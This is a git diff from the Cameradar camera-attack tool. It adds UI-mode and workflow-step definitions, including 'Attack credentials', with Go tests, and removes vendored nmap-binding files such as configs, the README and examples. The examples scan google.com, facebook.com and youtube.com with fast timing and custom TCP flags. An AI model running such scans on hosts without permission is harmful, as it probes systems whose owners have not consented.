// Mode defines which UI renderer to use.
|
||||
type Mode string
|
||||
|
||||
// Supported rendering modes.
|
||||
const (
|
||||
ModeAuto Mode = "auto"
|
||||
ModeTUI Mode = "tui"
|
||||
ModePlain Mode = "plain"
|
||||
)
|
||||
|
||||
// Step identifies a stage in the workflow.
|
||||
type Step string
|
||||
|
||||
// Supported steps.
|
||||
const (
|
||||
StepScan Step = "scan"
|
||||
StepAttackRoutes Step = "attack-routes"
|
||||
StepDetectAuth Step = "detect-auth"
|
||||
StepAttackCredentials Step = "attack-credentials"
|
||||
StepValidateStreams Step = "validate-streams"
|
||||
StepSummary Step = "summary"
|
||||
)
|
||||
|
||||
// StepLabel returns the human-readable label for a step.
|
||||
func StepLabel(step Step) string {
|
||||
switch step {
|
||||
case StepScan:
|
||||
return "Scan targets"
|
||||
case StepAttackRoutes:
|
||||
return "Attack routes"
|
||||
case StepDetectAuth:
|
||||
return "Detect authentication"
|
||||
case StepAttackCredentials:
|
||||
return "Attack credentials"
|
||||
case StepValidateStreams:
|
||||
return "Validate streams"
|
||||
case StepSummary:
|
||||
return "Summary"
|
||||
default:
|
||||
return string(step)
|
||||
}
|
||||
}
|
||||
|
||||
// Steps returns the ordered list of steps.
|
||||
func Steps() []Step {
|
||||
return []Step{
|
||||
StepScan,
|
||||
StepAttackRoutes,
|
||||
StepDetectAuth,
|
||||
StepAttackCredentials,
|
||||
StepValidateStreams,
|
||||
StepSummary,
|
||||
}
|
||||
}
|
||||
|
||||
// ParseMode parses a user-provided UI mode.
|
||||
func ParseMode(value string) (Mode, error) {
|
||||
mode := Mode(strings.ToLower(strings.TrimSpace(value)))
|
||||
switch mode {
|
||||
case ModeAuto, ModeTUI, ModePlain:
|
||||
return mode, nil
|
||||
case "":
|
||||
return ModeAuto, nil
|
||||
default:
|
||||
return ModeAuto, fmt.Errorf("invalid ui mode %q", value)
|
||||
}
|
||||
}
|
||||
+94
@@ -0,0 +1,94 @@
|
||||
package cameradar_test
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestParseMode(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
input string
|
||||
want cameradar.Mode
|
||||
wantErr require.ErrorAssertionFunc
|
||||
wantErrMessage string
|
||||
}{
|
||||
{
|
||||
name: "auto",
|
||||
input: "auto",
|
||||
want: cameradar.ModeAuto,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "tui",
|
||||
input: "TUI",
|
||||
want: cameradar.ModeTUI,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "plain",
|
||||
input: "plain",
|
||||
want: cameradar.ModePlain,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "empty",
|
||||
input: " ",
|
||||
want: cameradar.ModeAuto,
|
||||
wantErr: require.NoError,
|
||||
},
|
||||
{
|
||||
name: "invalid",
|
||||
input: "nope",
|
||||
want: cameradar.ModeAuto,
|
||||
wantErr: require.Error,
|
||||
wantErrMessage: "invalid ui mode",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
got, err := cameradar.ParseMode(test.input)
|
||||
test.wantErr(t, err)
|
||||
if test.wantErrMessage != "" {
|
||||
assert.ErrorContains(t, err, test.wantErrMessage)
|
||||
}
|
||||
assert.Equal(t, test.want, got)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestStepLabel(t *testing.T) {
|
||||
tests := []struct {
|
||||
step cameradar.Step
|
||||
want string
|
||||
}{
|
||||
{step: cameradar.StepScan, want: "Scan targets"},
|
||||
{step: cameradar.StepAttackRoutes, want: "Attack routes"},
|
||||
{step: cameradar.StepDetectAuth, want: "Detect authentication"},
|
||||
{step: cameradar.StepAttackCredentials, want: "Attack credentials"},
|
||||
{step: cameradar.StepValidateStreams, want: "Validate streams"},
|
||||
{step: cameradar.StepSummary, want: "Summary"},
|
||||
{step: cameradar.Step("custom"), want: "custom"},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.want, func(t *testing.T) {
|
||||
assert.Equal(t, test.want, cameradar.StepLabel(test.step))
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSteps(t *testing.T) {
|
||||
assert.Equal(t, []cameradar.Step{
|
||||
cameradar.StepScan,
|
||||
cameradar.StepAttackRoutes,
|
||||
cameradar.StepDetectAuth,
|
||||
cameradar.StepAttackCredentials,
|
||||
cameradar.StepValidateStreams,
|
||||
cameradar.StepSummary,
|
||||
}, cameradar.Steps())
|
||||
}
|
||||
-123
@@ -1,123 +0,0 @@
|
||||
## Golang
|
||||
|
||||
### Binaries for programs and plugins
|
||||
*.exe
|
||||
*.exe~
|
||||
*.dll
|
||||
*.so
|
||||
*.dylib
|
||||
|
||||
### Test binary, built with `go test -c`
|
||||
*.test
|
||||
|
||||
### Output of the go coverage tool, specifically when used with LiteIDE
|
||||
*.out
|
||||
|
||||
## MacOS
|
||||
|
||||
### General
|
||||
.DS_Store
|
||||
.AppleDouble
|
||||
.LSOverride
|
||||
|
||||
### Icon must end with two \r
|
||||
Icon
|
||||
|
||||
|
||||
### Thumbnails
|
||||
._*
|
||||
|
||||
### Files that might appear in the root of a volume
|
||||
.DocumentRevisions-V100
|
||||
.fseventsd
|
||||
.Spotlight-V100
|
||||
.TemporaryItems
|
||||
.Trashes
|
||||
.VolumeIcon.icns
|
||||
.com.apple.timemachine.donotpresent
|
||||
|
||||
### Directories potentially created on remote AFP share
|
||||
.AppleDB
|
||||
.AppleDesktop
|
||||
Network Trash Folder
|
||||
Temporary Items
|
||||
.apdisk
|
||||
|
||||
## IDEs
|
||||
|
||||
### VSCode
|
||||
|
||||
.vscode/*
|
||||
!.vscode/settings.json
|
||||
!.vscode/tasks.json
|
||||
!.vscode/launch.json
|
||||
!.vscode/extensions.json
|
||||
|
||||
### JetBrains
|
||||
|
||||
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
|
||||
# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
|
||||
|
||||
# User-specific stuff
|
||||
.idea/**/workspace.xml
|
||||
.idea/**/tasks.xml
|
||||
.idea/**/usage.statistics.xml
|
||||
.idea/**/dictionaries
|
||||
.idea/**/shelf
|
||||
|
||||
# Generated files
|
||||
.idea/**/contentModel.xml
|
||||
|
||||
# Sensitive or high-churn files
|
||||
.idea/**/dataSources/
|
||||
.idea/**/dataSources.ids
|
||||
.idea/**/dataSources.local.xml
|
||||
.idea/**/sqlDataSources.xml
|
||||
.idea/**/dynamic.xml
|
||||
.idea/**/uiDesigner.xml
|
||||
.idea/**/dbnavigator.xml
|
||||
|
||||
# Gradle
|
||||
.idea/**/gradle.xml
|
||||
.idea/**/libraries
|
||||
|
||||
# Gradle and Maven with auto-import
|
||||
# When using Gradle or Maven with auto-import, you should exclude module files,
|
||||
# since they will be recreated, and may cause churn. Uncomment if using
|
||||
# auto-import.
|
||||
# .idea/modules.xml
|
||||
# .idea/*.iml
|
||||
# .idea/modules
|
||||
|
||||
# CMake
|
||||
cmake-build-*/
|
||||
|
||||
# Mongo Explorer plugin
|
||||
.idea/**/mongoSettings.xml
|
||||
|
||||
# File-based project format
|
||||
*.iws
|
||||
|
||||
# IntelliJ
|
||||
out/
|
||||
|
||||
# mpeltonen/sbt-idea plugin
|
||||
.idea_modules/
|
||||
|
||||
# JIRA plugin
|
||||
atlassian-ide-plugin.xml
|
||||
|
||||
# Cursive Clojure plugin
|
||||
.idea/replstate.xml
|
||||
|
||||
# Crashlytics plugin (for Android Studio and IntelliJ)
|
||||
com_crashlytics_export_strings.xml
|
||||
crashlytics.properties
|
||||
crashlytics-build.properties
|
||||
fabric.properties
|
||||
|
||||
# Editor-based Rest Client
|
||||
.idea/httpRequests
|
||||
|
||||
# Android studio 3.1+ serialized cache file
|
||||
.idea/caches/build_file_checksums.ser
|
||||
-159
@@ -1,159 +0,0 @@
|
||||
# This file contains all available configuration options
|
||||
# with their default values.
|
||||
|
||||
# options for analysis running
|
||||
run:
|
||||
# timeout for analysis, e.g. 30s, 5m, default is 1m
|
||||
deadline: 1m
|
||||
|
||||
tests: false
|
||||
|
||||
# which dirs to skip: they won't be analyzed;
|
||||
# can use regexp here: generated.*, regexp is applied on full path;
|
||||
# default value is empty list, but next dirs are always skipped independently
|
||||
# from this option's value:
|
||||
# vendor$, third_party$, testdata$, examples$, Godeps$, builtin$
|
||||
skip-dirs:
|
||||
- pkg/osfamilies
|
||||
|
||||
# output configuration options
|
||||
output:
|
||||
# colored-line-number|line-number|json|tab|checkstyle, default is "colored-line-number"
|
||||
format: colored-line-number
|
||||
|
||||
# print lines of code with issue, default is true
|
||||
print-issued-lines: true
|
||||
|
||||
# print linter name in the end of issue text, default is true
|
||||
print-linter-name: true
|
||||
|
||||
|
||||
# all available settings of specific linters
|
||||
linters-settings:
|
||||
errcheck:
|
||||
# report about not checking of errors in type assetions: `a := b.(MyStruct)`;
|
||||
# default is false: such cases aren't reported by default.
|
||||
check-type-assertions: false
|
||||
|
||||
# report about assignment of errors to blank identifier: `num, _ := strconv.Atoi(numStr)`;
|
||||
# default is false: such cases aren't reported by default.
|
||||
check-blank: false
|
||||
|
||||
# [deprecated] comma-separated list of pairs of the form pkg:regex
|
||||
# the regex is used to ignore names within pkg. (default "fmt:.*").
|
||||
# see https://github.com/kisielk/errcheck#the-deprecated-method for details
|
||||
ignore: fmt:.*,io/ioutil:^Read.*,os/exec:^Kill.*
|
||||
|
||||
govet:
|
||||
# report about shadowed variables
|
||||
check-shadowing: true
|
||||
golint:
|
||||
# minimal confidence for issues, default is 0.8
|
||||
min-confidence: 0.8
|
||||
gofmt:
|
||||
# simplify code: gofmt with `-s` option, true by default
|
||||
simplify: true
|
||||
goimports:
|
||||
# put imports beginning with prefix after 3rd-party packages;
|
||||
# it's a comma-separated list of prefixes
|
||||
local-prefixes: github.com/org/project
|
||||
gocyclo:
|
||||
# minimal code complexity to report, 30 by default (but we recommend 10-20)
|
||||
min-complexity: 10
|
||||
maligned:
|
||||
# print struct with more effective memory layout or not, false by default
|
||||
suggest-new: true
|
||||
dupl:
|
||||
# tokens count to trigger issue, 150 by default
|
||||
threshold: 150
|
||||
goconst:
|
||||
# minimal length of string constant, 3 by default
|
||||
min-len: 3
|
||||
# minimal occurrences count to trigger, 3 by default
|
||||
min-occurrences: 3
|
||||
depguard:
|
||||
list-type: blacklist
|
||||
include-go-root: false
|
||||
packages:
|
||||
- github.com/davecgh/go-spew/spew
|
||||
misspell:
|
||||
# Correct spellings using locale preferences for US or UK.
|
||||
# Default is to use a neutral variety of English.
|
||||
# Setting locale to US will correct the British spelling of 'colour' to 'color'.
|
||||
locale: US
|
||||
lll:
|
||||
# max line length, lines longer will be reported. Default is 120.
|
||||
# '\t' is counted as 1 character by default, and can be changed with the tab-width option
|
||||
line-length: 120
|
||||
# tab width in spaces. Default to 1.
|
||||
tab-width: 1
|
||||
unused:
|
||||
# treat code as a program (not a library) and report unused exported identifiers; default is false.
|
||||
# XXX: if you enable this setting, unused will report a lot of false-positives in text editors:
|
||||
# if it's called for subdir of a project it can't find funcs usages. All text editor integrations
|
||||
# with golangci-lint call it on a directory with the changed file.
|
||||
check-exported: false
|
||||
unparam:
|
||||
# call graph construction algorithm (cha, rta). In general, use cha for libraries,
|
||||
# and rta for programs with main packages. Default is cha.
|
||||
algo: cha
|
||||
|
||||
# Inspect exported functions, default is false. Set to true if no external program/library imports your code.
|
||||
# XXX: if you enable this setting, unparam will report a lot of false-positives in text editors:
|
||||
# if it's called for subdir of a project it can't find external interfaces. All text editor integrations
|
||||
# with golangci-lint call it on a directory with the changed file.
|
||||
check-exported: false
|
||||
nakedret:
|
||||
# make an issue if func has more lines of code than this setting and it has naked returns; default is 30
|
||||
max-func-lines: 30
|
||||
prealloc:
|
||||
# XXX: we don't recommend using this linter before doing performance profiling.
|
||||
# For most programs usage of prealloc will be a premature optimization.
|
||||
|
||||
# Report preallocation suggestions only on simple loops that have no returns/breaks/continues/gotos in them.
|
||||
# True by default.
|
||||
simple: true
|
||||
range-loops: true # Report preallocation suggestions on range loops, true by default
|
||||
for-loops: false # Report preallocation suggestions on for loops, false by default
|
||||
gocritic:
|
||||
# Enable multiple checks by tags, run `GL_DEBUG=gocritic golangci-lint` run to see all tags and checks.
|
||||
# Empty list by default. See https://github.com/go-critic/go-critic#usage -> section "Tags".
|
||||
enabled-tags:
|
||||
- performance
|
||||
|
||||
linters:
|
||||
enable:
|
||||
- megacheck
|
||||
- govet
|
||||
enable-all: false
|
||||
disable:
|
||||
- maligned
|
||||
- prealloc
|
||||
disable-all: false
|
||||
presets:
|
||||
- bugs
|
||||
- unused
|
||||
fast: false
|
||||
|
||||
|
||||
issues:
|
||||
# List of regexps of issue texts to exclude, empty list by default.
|
||||
# But independently from this option we use default exclude patterns,
|
||||
# it can be disabled by `exclude-use-default: false`. To list all
|
||||
# excluded by default patterns execute `golangci-lint run --help`
|
||||
exclude:
|
||||
- "Subprocess launching should be audited"
|
||||
|
||||
# Maximum issues count per one linter. Set to 0 to disable. Default is 50.
|
||||
max-per-linter: 0
|
||||
|
||||
# Maximum count of issues with the same text. Set to 0 to disable. Default is 3.
|
||||
max-same-issues: 0
|
||||
|
||||
# Show only new issues: if there are unstaged changes or untracked files,
|
||||
# only those changes are analyzed, else only changes in HEAD~ are analyzed.
|
||||
# It's a super-useful option for integration of golangci-lint into existing
|
||||
# large codebase. It's not practical to fix all existing issues at the moment
|
||||
# of integration: much better don't allow issues in new code.
|
||||
# Default is false.
|
||||
new: false
|
||||
-20
@@ -1,20 +0,0 @@
|
||||
dist: trusty
|
||||
sudo: required
|
||||
language: go
|
||||
|
||||
before_install:
|
||||
- sudo apt-get install -y nmap
|
||||
- go get github.com/mattn/goveralls
|
||||
|
||||
script:
|
||||
# Run unit tests
|
||||
- go test -v -covermode=count -coverprofile=coverage.out
|
||||
- $HOME/gopath/bin/goveralls -coverprofile=coverage.out -service=travis-ci -repotoken=$COVERALLS_TOKEN
|
||||
# Ensure the examples compile
|
||||
- for dir in examples/*/; do go build -o $dir/bin $dir/main.go; done
|
||||
notifications:
|
||||
email:
|
||||
recipients:
|
||||
- brendan.le-glaunec@epitech.eu
|
||||
on_success: never
|
||||
on_failure: always
|
||||
-21
@@ -1,21 +0,0 @@
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2019 Ullaakut
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
-114
@@ -1,114 +0,0 @@
|
||||
# nmap
|
||||
|
||||
<p align="center">
|
||||
<img width="350" src="img/logo.png"/>
|
||||
<p>
|
||||
|
||||
<p align="center">
|
||||
<a href="LICENSE">
|
||||
<img src="https://img.shields.io/badge/license-MIT-blue.svg?style=flat" />
|
||||
</a>
|
||||
<a href="https://godoc.org/github.com/Ullaakut/nmap">
|
||||
<img src="https://godoc.org/github.com/Ullaakut/cameradar?status.svg" />
|
||||
</a>
|
||||
<a href="https://goreportcard.com/report/github.com/ullaakut/nmap">
|
||||
<img src="https://goreportcard.com/badge/github.com/ullaakut/nmap">
|
||||
</a>
|
||||
<a href="https://travis-ci.org/Ullaakut/nmap">
|
||||
<img src="https://travis-ci.org/Ullaakut/nmap.svg?branch=master">
|
||||
</a>
|
||||
<a href="https://coveralls.io/github/Ullaakut/nmap?branch=master">
|
||||
<img src="https://coveralls.io/repos/github/Ullaakut/nmap/badge.svg?branch=master">
|
||||
</a>
|
||||
<p>
|
||||
|
||||
This library aims at providing idiomatic `nmap` bindings for go developers, in order to make it easier to write security audit tools using golang.
|
||||
|
||||
<!-- It allows not only to parse the XML output of nmap, but also to get the output of nmap as it is running, through a channel. This can be useful for computing a scan's progress, or simply displaying live information to your users. -->
|
||||
|
||||
## It's currently a work in progress
|
||||
|
||||
This paragraph won't be removed until the library is ready to be used and properly documented.
|
||||
|
||||
## Supported features
|
||||
|
||||
- [x] All of `nmap`'s options as `WithXXX` methods.
|
||||
- [x] Cancellable contexts support.
|
||||
- [x] [Idiomatic go filters](examples/service_detection/main.go#L19).
|
||||
- [x] Helpful enums for most nmap commands. (time templates, os families, port states, etc.)
|
||||
- [x] Complete documentation of each option, mostly insipred from nmap's documentation.
|
||||
|
||||
## TODO
|
||||
|
||||
- [ ] Examples of usage - Work in progress (4/7 examples so far)
|
||||
- [ ] Complete unit tests - Work in progress (95% coverage so far)
|
||||
- [ ] Asynchronous scan
|
||||
|
||||
## Example
|
||||
|
||||
```go
|
||||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"log"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/nmap"
|
||||
)
|
||||
|
||||
func main() {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Minute)
|
||||
defer cancel()
|
||||
|
||||
// Equivalent to `/usr/local/bin/nmap -p 80,443,843 google.com facebook.com youtube.com`,
|
||||
// with a 5 minute timeout.
|
||||
scanner, err := nmap.NewScanner(
|
||||
nmap.WithTargets("google.com", "facebook.com", "youtube.com"),
|
||||
nmap.WithPorts("80,443,843"),
|
||||
nmap.WithContext(ctx),
|
||||
)
|
||||
if err != nil {
|
||||
log.Fatalf("unable to create nmap scanner: %v", err)
|
||||
}
|
||||
|
||||
result, err := scanner.Run()
|
||||
if err != nil {
|
||||
log.Fatalf("unable to run nmap scan: %v", err)
|
||||
}
|
||||
|
||||
// Use the results to print an example output
|
||||
for _, host := range result.Hosts {
|
||||
if len(host.Ports) == 0 || len(host.Addresses) == 0 {
|
||||
continue
|
||||
}
|
||||
|
||||
fmt.Printf("Host %q:\n", host.Addresses[0])
|
||||
|
||||
for _, port := range host.Ports {
|
||||
fmt.Printf("\tPort %d/%s %s %s\n", port.ID, port.Protocol, port.State, port.Service.Name)
|
||||
}
|
||||
}
|
||||
|
||||
fmt.Printf("Nmap done: %d hosts up scanned in %3f seconds\n", len(result.Hosts), result.Stats.Finished.Elapsed)
|
||||
}
|
||||
```
|
||||
|
||||
The program above outputs:
|
||||
|
||||
```bash
|
||||
Host "172.217.16.46":
|
||||
Port 80/tcp open http
|
||||
Port 443/tcp open https
|
||||
Port 843/tcp filtered unknown
|
||||
Host "31.13.81.36":
|
||||
Port 80/tcp open http
|
||||
Port 443/tcp open https
|
||||
Port 843/tcp open unknown
|
||||
Host "216.58.215.110":
|
||||
Port 80/tcp open http
|
||||
Port 443/tcp open https
|
||||
Port 843/tcp filtered unknown
|
||||
Nmap done: 3 hosts up scanned in 1.29 seconds
|
||||
```
|
||||
-18
@@ -1,18 +0,0 @@
|
||||
package nmap
|
||||
|
||||
import (
|
||||
"errors"
|
||||
)
|
||||
|
||||
var (
|
||||
// ErrNmapNotInstalled means that upon trying to manually locate nmap in the user's path,
|
||||
// it was not found. Either use the WithBinaryPath method to set it manually, or make sure that
|
||||
// the nmap binary is present in the user's $PATH.
|
||||
ErrNmapNotInstalled = errors.New("'nmap' binary was not found")
|
||||
|
||||
// ErrScanTimeout means that the provided context was done before the scanner finished its scan.
|
||||
ErrScanTimeout = errors.New("nmap scan timed out")
|
||||
|
||||
// ErrNoTargetsSpecified means that no targets were specified.
|
||||
ErrNoTargetsSpecified = errors.New("no targets specified")
|
||||
)
|
||||
-64
@@ -1,64 +0,0 @@
|
||||
package nmap
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"log"
|
||||
)
|
||||
|
||||
// A scanner can be instanciated with options to set the arguments
|
||||
// that are given to nmap.
|
||||
func ExampleScanner_simple() {
|
||||
s, err := NewScanner(
|
||||
WithTargets("google.com", "facebook.com", "youtube.com"),
|
||||
WithCustomDNSServers("8.8.8.8", "8.8.4.4"),
|
||||
WithTimingTemplate(TimingFastest),
|
||||
WithTCPScanFlags(FlagACK, FlagNULL, FlagRST),
|
||||
)
|
||||
if err != nil {
|
||||
log.Fatalf("unable to create nmap scanner: %v", err)
|
||||
}
|
||||
|
||||
scanResult, err := s.Run()
|
||||
if err != nil {
|
||||
log.Fatalf("nmap encountered an error: %v", err)
|
||||
}
|
||||
|
||||
fmt.Printf(
|
||||
"Scan successful: %d hosts up\n",
|
||||
scanResult.Stats.Hosts.Up,
|
||||
)
|
||||
// Output: Scan successful: 3 hosts up
|
||||
}
|
||||
|
||||
// A scanner can be given custom idiomatic filters for both hosts
|
||||
// and ports.
|
||||
func ExampleScanner_filters() {
|
||||
s, err := NewScanner(
|
||||
WithTargets("google.com", "facebook.com"),
|
||||
WithPorts("843"),
|
||||
WithFilterHost(func(h Host) bool {
|
||||
// Filter out hosts with no open ports.
|
||||
for idx := range h.Ports {
|
||||
if h.Ports[idx].Status() == "open" {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}),
|
||||
)
|
||||
if err != nil {
|
||||
log.Fatalf("unable to create nmap scanner: %v", err)
|
||||
}
|
||||
|
||||
scanResult, err := s.Run()
|
||||
if err != nil {
|
||||
log.Fatalf("nmap encountered an error: %v", err)
|
||||
}
|
||||
|
||||
fmt.Printf(
|
||||
"Filtered out hosts %d / Original number of hosts: %d\n",
|
||||
len(scanResult.Hosts),
|
||||
scanResult.Stats.Hosts.Total,
|
||||
)
|
||||
// Output: Filtered out hosts 1 / Original number of hosts: 2
|
||||
}
|
||||
-1216
File diff suppressed because it is too large
Load Diff
-1781
File diff suppressed because it is too large
Load Diff
-644
@@ -1,644 +0,0 @@
|
||||
package osfamilies
|
||||
|
||||
// OSFamily describes an OS Family, usually from a constructor or
|
||||
// a kernel.
|
||||
type OSFamily string
|
||||
|
||||
// OSFamily definitions.
|
||||
const (
|
||||
TwoN OSFamily = "2N"
|
||||
TwoWire OSFamily = "2Wire"
|
||||
ThreeCom OSFamily = "3Com"
|
||||
ThreeM OSFamily = "3M"
|
||||
FourG OSFamily = "4G"
|
||||
ATec OSFamily = "A-Tec"
|
||||
ADIC OSFamily = "ADIC"
|
||||
AKCP OSFamily = "AKCP"
|
||||
AMX OSFamily = "AMX"
|
||||
APC OSFamily = "APC"
|
||||
ARCA OSFamily = "ARCA"
|
||||
ATandT OSFamily = "AT&T"
|
||||
AVM OSFamily = "AVM"
|
||||
AVtech OSFamily = "AVtech"
|
||||
AXIS OSFamily = "AXIS"
|
||||
Aastra OSFamily = "Aastra"
|
||||
AcBel OSFamily = "AcBel"
|
||||
Aceex OSFamily = "Aceex"
|
||||
Acer OSFamily = "Acer"
|
||||
Acme OSFamily = "Acme"
|
||||
Acorp OSFamily = "Acorp"
|
||||
Actiontec OSFamily = "Actiontec"
|
||||
Adaptec OSFamily = "Adaptec"
|
||||
Adtran OSFamily = "Adtran"
|
||||
Adva OSFamily = "Adva"
|
||||
Advanced OSFamily = "Advanced"
|
||||
Aerohive OSFamily = "Aerohive"
|
||||
Aethra OSFamily = "Aethra"
|
||||
Agfa OSFamily = "Agfa"
|
||||
AirLive OSFamily = "AirLive"
|
||||
AirMagnet OSFamily = "AirMagnet"
|
||||
AirSpan OSFamily = "AirSpan"
|
||||
Airaya OSFamily = "Airaya"
|
||||
Airlink101 OSFamily = "Airlink101"
|
||||
Airnet OSFamily = "Airnet"
|
||||
Airvana OSFamily = "Airvana"
|
||||
Alaxala OSFamily = "Alaxala"
|
||||
Alcatel OSFamily = "Alcatel"
|
||||
AlcatelLucent OSFamily = "Alcatel-Lucent"
|
||||
Alice OSFamily = "Alice"
|
||||
AllenBradley OSFamily = "Allen-Bradley"
|
||||
Allied OSFamily = "Allied"
|
||||
Allnet OSFamily = "Allnet"
|
||||
Allworx OSFamily = "Allworx"
|
||||
Alvarion OSFamily = "Alvarion"
|
||||
Amazon OSFamily = "Amazon"
|
||||
Ambit OSFamily = "Ambit"
|
||||
Amiga OSFamily = "Amiga"
|
||||
Anue OSFamily = "Anue"
|
||||
Apple OSFamily = "Apple"
|
||||
Arcor OSFamily = "Arcor"
|
||||
Areca OSFamily = "Areca"
|
||||
Argon OSFamily = "Argon"
|
||||
Argosy OSFamily = "Argosy"
|
||||
Arris OSFamily = "Arris"
|
||||
Aruba OSFamily = "Aruba"
|
||||
Asmax OSFamily = "Asmax"
|
||||
Asus OSFamily = "Asus"
|
||||
Atari OSFamily = "Atari"
|
||||
Atcom OSFamily = "Atcom"
|
||||
AudioCodes OSFamily = "AudioCodes"
|
||||
AudioControl OSFamily = "AudioControl"
|
||||
Avaya OSFamily = "Avaya"
|
||||
Avocent OSFamily = "Avocent"
|
||||
Axcient OSFamily = "Axcient"
|
||||
AzBox OSFamily = "AzBox"
|
||||
BECK OSFamily = "BECK"
|
||||
BSD OSFamily = "BSD"
|
||||
BSDI OSFamily = "BSDI"
|
||||
BT OSFamily = "BT"
|
||||
Barracuda OSFamily = "Barracuda"
|
||||
Barrelfish OSFamily = "Barrelfish"
|
||||
Basler OSFamily = "Basler"
|
||||
Bay OSFamily = "Bay"
|
||||
BeaconMedaes OSFamily = "BeaconMedaes"
|
||||
Beat OSFamily = "Beat"
|
||||
Belkin OSFamily = "Belkin"
|
||||
Bell OSFamily = "Bell"
|
||||
Billion OSFamily = "Billion"
|
||||
BinTec OSFamily = "BinTec"
|
||||
BlackBox OSFamily = "BlackBox"
|
||||
Blackboard OSFamily = "Blackboard"
|
||||
Blue OSFamily = "Blue"
|
||||
BlueArc OSFamily = "BlueArc"
|
||||
Bluebird OSFamily = "Bluebird"
|
||||
Bomara OSFamily = "Bomara"
|
||||
Bosch OSFamily = "Bosch"
|
||||
Bose OSFamily = "Bose"
|
||||
Boundless OSFamily = "Boundless"
|
||||
Bowers OSFamily = "Bowers"
|
||||
British OSFamily = "British"
|
||||
BroadMax OSFamily = "BroadMax"
|
||||
Brocade OSFamily = "Brocade"
|
||||
Brother OSFamily = "Brother"
|
||||
Buffalo OSFamily = "Buffalo"
|
||||
Burny OSFamily = "Burny"
|
||||
Bush OSFamily = "Bush"
|
||||
CNav OSFamily = "C-Nav"
|
||||
CAEN OSFamily = "CAEN"
|
||||
CMI OSFamily = "CMI"
|
||||
Cabletron OSFamily = "Cabletron"
|
||||
Caldera OSFamily = "Caldera"
|
||||
Calix OSFamily = "Calix"
|
||||
Cameo OSFamily = "Cameo"
|
||||
Canon OSFamily = "Canon"
|
||||
Casio OSFamily = "Casio"
|
||||
Cayman OSFamily = "Cayman"
|
||||
Ceedtec OSFamily = "Ceedtec"
|
||||
Check OSFamily = "Check"
|
||||
Chip OSFamily = "Chip"
|
||||
CipherLab OSFamily = "CipherLab"
|
||||
Cisco OSFamily = "Cisco"
|
||||
Citrix OSFamily = "Citrix"
|
||||
CoRAID OSFamily = "CoRAID"
|
||||
Cobalt OSFamily = "Cobalt"
|
||||
Cognex OSFamily = "Cognex"
|
||||
Comau OSFamily = "Comau"
|
||||
Compal OSFamily = "Compal"
|
||||
Compaq OSFamily = "Compaq"
|
||||
Comtrend OSFamily = "Comtrend"
|
||||
Conceptronic OSFamily = "Conceptronic"
|
||||
Control4 OSFamily = "Control4"
|
||||
Coyote OSFamily = "Coyote"
|
||||
Cray OSFamily = "Cray"
|
||||
Crestron OSFamily = "Crestron"
|
||||
CyanogenMod OSFamily = "CyanogenMod"
|
||||
Cyberoam OSFamily = "Cyberoam"
|
||||
Cymphonix OSFamily = "Cymphonix"
|
||||
DLink OSFamily = "D-Link"
|
||||
DEC OSFamily = "DEC"
|
||||
DMP OSFamily = "DMP"
|
||||
DTE OSFamily = "DTE"
|
||||
DVTel OSFamily = "DVTel"
|
||||
DYMO OSFamily = "DYMO"
|
||||
Data OSFamily = "Data"
|
||||
Datalogic OSFamily = "Datalogic"
|
||||
Daysequerra OSFamily = "Daysequerra"
|
||||
Decru OSFamily = "Decru"
|
||||
Dedicated OSFamily = "Dedicated"
|
||||
Dell OSFamily = "Dell"
|
||||
Denon OSFamily = "Denon"
|
||||
Denver OSFamily = "Denver"
|
||||
Develop OSFamily = "Develop"
|
||||
Dick OSFamily = "Dick"
|
||||
Digi OSFamily = "Digi"
|
||||
Digital OSFamily = "Digital"
|
||||
Digitus OSFamily = "Digitus"
|
||||
Digium OSFamily = "Digium"
|
||||
DirecTV OSFamily = "DirecTV"
|
||||
Dish OSFamily = "Dish"
|
||||
Dolby OSFamily = "Dolby"
|
||||
DragonFly OSFamily = "DragonFly"
|
||||
DragonWave OSFamily = "DragonWave"
|
||||
DrayTek OSFamily = "DrayTek"
|
||||
Draytek OSFamily = "Draytek"
|
||||
Drayton OSFamily = "Drayton"
|
||||
Dream OSFamily = "Dream"
|
